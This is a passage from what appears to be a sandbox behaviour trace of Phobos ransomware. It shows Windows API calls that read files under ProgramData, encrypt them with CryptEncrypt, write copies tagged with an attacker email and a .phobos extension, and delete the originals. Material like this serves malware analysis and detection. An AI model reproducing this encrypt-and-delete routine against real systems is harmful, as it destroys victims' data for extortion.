"c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0172.891] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0172.891] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0172.891] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0172.891] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0172.891] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0172.891] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0172.891] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x6960, lpOverlapped=0x0) returned 1 [0173.405] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6970, dwBufLen=0x6970 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6970) returned 1 [0173.406] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6970, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6970, lpOverlapped=0x0) returned 1 [0173.407] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0173.407] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0173.407] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0173.407] CryptDestroyKey (hKey=0xa32d28) returned 1 [0173.407] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0173.407] CryptDestroyKey (hKey=0xa327e8) returned 1 [0173.407] CloseHandle (hObject=0x14c) returned 1 [0173.407] CloseHandle (hObject=0x194) returned 1 [0173.407] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll")) returned 1 [0173.408] SetEvent (hEvent=0xe8) returned 1 [0173.408] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0173.408] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0173.409] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1117024) returned 1 [0173.409] CloseHandle (hObject=0x194) returned 1 [0173.409] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll")) returned 0x2020 [0173.409] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0173.409] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0173.409] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0173.409] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0173.410] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0173.410] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0173.410] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0173.410] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x110100, lpOverlapped=0x0) returned 1 [0174.184] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100, dwBufLen=0x110100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100) returned 1 [0174.194] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110100, lpOverlapped=0x0) returned 1 [0174.212] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xa60, lpOverlapped=0x0) returned 1 [0174.212] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa70, dwBufLen=0xa70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa70) returned 1 [0174.212] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa70, lpOverlapped=0x0) returned 1 [0174.212] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0174.212] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.212] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0174.212] CryptDestroyKey (hKey=0xa32d28) returned 1 [0174.212] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0174.212] CryptDestroyKey (hKey=0xa327e8) returned 1 [0174.212] CloseHandle (hObject=0x194) returned 1 [0174.212] CloseHandle (hObject=0x14c) returned 1 [0174.213] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll")) returned 1 [0174.240] SetEvent (hEvent=0xe8) returned 1 [0174.240] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0174.240] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0174.240] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=544768) returned 1 [0174.240] CloseHandle (hObject=0x14c) returned 1 [0174.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf")) returned 0x2020 [0174.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.240] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0174.241] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.241] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.241] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0174.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ce8) returned 1 [0174.241] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.241] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85000, lpOverlapped=0x0) returned 1 [0174.390] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x85010, dwBufLen=0x85010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x85010) returned 1 [0174.398] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x85010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x85010, lpOverlapped=0x0) returned 1 [0174.407] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0174.407] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.407] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0174.407] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0174.407] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0174.408] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.408] CloseHandle (hObject=0x14c) returned 1 [0174.408] CloseHandle (hObject=0x130) returned 1 [0174.408] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf")) returned 1 [0174.413] SetEvent (hEvent=0xe8) returned 1 [0174.413] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0174.413] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\SystemIndex.1.gthr" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\gatherlogs\\systemindex\\systemindex.1.gthr"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0174.558] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=558) returned 1 [0174.558] CloseHandle (hObject=0x130) returned 1 [0174.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\SystemIndex.1.gthr" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\gatherlogs\\systemindex\\systemindex.1.gthr")) returned 0x2020 [0174.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\SystemIndex.1.gthr.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\gatherlogs\\systemindex\\systemindex.1.gthr.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.559] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\SystemIndex.1.gthr" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\gatherlogs\\systemindex\\systemindex.1.gthr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0174.559] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.560] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.560] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\SystemIndex.1.gthr.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\gatherlogs\\systemindex\\systemindex.1.gthr.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0174.560] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ce8) returned 1 [0174.560] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.560] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x22e, lpOverlapped=0x0) returned 1 [0174.561] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x230, dwBufLen=0x230 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x230) returned 1 [0174.561] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x230, lpOverlapped=0x0) returned 1 [0174.562] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0174.562] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.562] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0174.562] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0174.562] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0174.562] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.562] CloseHandle (hObject=0x130) returned 1 [0174.562] CloseHandle (hObject=0x180) returned 1 [0174.562] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\SystemIndex.1.gthr" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\gatherlogs\\systemindex\\systemindex.1.gthr")) returned 1 [0174.563] SetEvent (hEvent=0xe8) returned 1 [0174.563] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0174.563] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSSres00001.jrs" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mssres00001.jrs"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0174.563] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1048576) returned 1 [0174.563] CloseHandle (hObject=0x180) returned 1 [0174.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSSres00001.jrs" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mssres00001.jrs")) returned 0x2020 [0174.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSSres00001.jrs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mssres00001.jrs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.563] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSSres00001.jrs" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mssres00001.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0174.564] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.564] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.564] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSSres00001.jrs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mssres00001.jrs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0174.564] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ce8) returned 1 [0174.564] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.564] ReadFile (in: hFile=0x180, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x100000, lpOverlapped=0x0) returned 1 [0174.618] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100010, dwBufLen=0x100010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100010) returned 1 [0174.626] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x100010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x100010, lpOverlapped=0x0) returned 1 [0174.645] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0174.645] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0174.645] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0174.645] CryptDestroyKey (hKey=0xa32d28) returned 1 [0174.645] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0174.645] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0174.645] CloseHandle (hObject=0x180) returned 1 [0174.645] CloseHandle (hObject=0x130) returned 1 [0174.645] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\MSSres00001.jrs" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\mssres00001.jrs")) returned 1 [0174.660] SetEvent (hEvent=0xe8) returned 1 [0174.660] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0174.661] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0001.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0001.000"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0174.661] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=240) returned 1 [0174.662] CloseHandle (hObject=0x130) returned 1 [0174.662] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0001.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0001.000")) returned 0x2020 [0174.664] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0001.000.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0001.000.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0174.664] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0001.000" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0001.000"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0174.664] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0174.664] SetFilePointerEx (in: hFile=0x130, 